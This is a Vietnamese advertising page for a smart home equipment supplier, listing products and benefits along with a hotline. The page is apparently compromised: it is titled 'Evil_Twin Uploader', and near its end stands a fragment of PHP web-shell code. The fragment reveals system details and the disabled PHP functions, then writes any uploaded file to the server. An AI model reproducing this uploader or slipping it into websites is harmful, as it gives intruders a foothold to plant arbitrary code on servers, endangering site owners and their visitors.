Evil_Twin Uploader

Cung cấp thiết bị nhà thông minh chính hãng 100% giá tốt nhất

Ngày nay không ít những sự cố xảy ra do chập cháy điện bởi các thiết bị kém chất lượng hay trộm cắp tài sản khi chủ nhà đi vắng. Một giải pháp được nhiều người lựa chọn đó là sử dụng lắp đặt các thiết bị cho nhà thông minh.

Chúng tôi chuyên cung cấp thiết bị nhà thông minh những sản phẩm công nghệ điều khiển tự động mà ở đó bạn không cần chạm tay trực tiếp mà những thiết bị này được điều khiển thông qua bộ điều khiển trung tâm nhà thông minh.

Chúng tôi cung cấp các thiết bị nhà thông minh như:

– Bộ điều khiển thông minh
Công tắc thông minh
Ổ điện thông minh
– Smart Hub
– Thiết bị an ninh và cảm biến cảnh báo
– Khóa cửa thông minh,
– Cảm biến cạy cửa,
– Cảm biến khí CO

cung cấp thiết bị nhà thông minh

Ưu điểm vượt trội của các thiết bị nhà thông minh:

Bật/tắt thiết bị điện dễ dàng bằng Smartphone:

Bạn đi công tác xa nhà, đi du lịch hay đi làm, chỉ bằng cách cài đặt phần mềm Nhà thông minh trên điện thoại, bạn có thể bật/tắt các thiết bị điện tử một cách nhanh chóng chỉ với 1 cú chạm nhẹ.

An toàn tuyệt đối về điện:

Các loại thiết bị điện thông minh cho gia đình, đặc biệt là công tắc cảm ứng thiết kế với tính năng tự ngắt điện khi quá tải kết hợp chất liệu cách điện cách nhiệt đảm bảo an toàn tuyệt đối ngay cả khi tay ướt vẫn không lo điện giật.

Nâng cao giá trị ngôi nhà, khẳng định đẳng cấp:

Với thiết kế siêu mỏng, bề mặt cảm ứng chạm với lớp kính cường lực cùng vòng tròn đèn LED chắc chắn sẽ khiến ngôi nhà trở nên sang trọng và tinh tế hơn.

Giải pháp chống trộm hoàn hảo:

Các thiết bị điện nhà thông minh có khả năng học hàng nghìn lệnh, trong đó có lệnh chống trộm. Có nghĩa là khi có kẻ lạ đột nhập vào nhà bạn, các thiết bị này sẽ tự động thông báo về điện thoại để bạn biết và kịp thời xử lý.

Chúng tôi tự hào là đơn vị cung cấp thiết bị nhà thông minh chính hãng với mục tiêu đến tự động hóa các ứng dụng điện trong ngôi nhà, nhằm giúp khách hàng tiết kiệm tối đa điện năng trong ngôi nhà, tiết kiệm thời gian, công sức và tiền bạc. Để được tư vấn và báo giá tốt nhất khách hàng vui lòng liên hệ Hotline:  024.6688.7518 

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial